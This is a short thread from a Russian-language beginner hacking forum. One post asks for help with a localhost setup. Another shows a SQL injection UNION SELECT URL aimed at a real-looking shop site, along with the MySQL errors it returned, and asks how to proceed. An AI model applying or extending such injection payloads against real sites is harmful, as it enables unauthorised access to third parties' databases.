привет хакер 9009 , c РОЖДЕСТВОМ !!! твои уроки очень интересны прдолжай……. у меня вопрос по установке ,,localhost,, я скачал по ссылке прогу ,установил ввожу в url localhost пишет сервер не найден, пробовал искать в Google ,там больше вопросов чем ответов ,у многих такая проблема ПОМОГИ
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-08 00:05:20.820000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Парни извините если не в тему!!!Просто очень хочется узнать..
http://www.aromat.ru/parfum/men_tend.php3?new=1&cat='2273+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Я делаю запрос у меня ошибка
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/fo/aromat/aromat_fo/parfum/men_tend.php3 on line 50
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/html/fo/aromat/aromat_fo/parfum/men_tend.php3 on line 51
А что дальше делать подскажите пожалуйста….
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-08 00:13:41.610000
|
|
|
free_kode
Сообщений: 505
Оценки: 0
Присоединился: 2008-10-24 15:19:05.420000
|
это тебе в соседнюю тему там вопросы про мускул
|
|
|
|
|
|
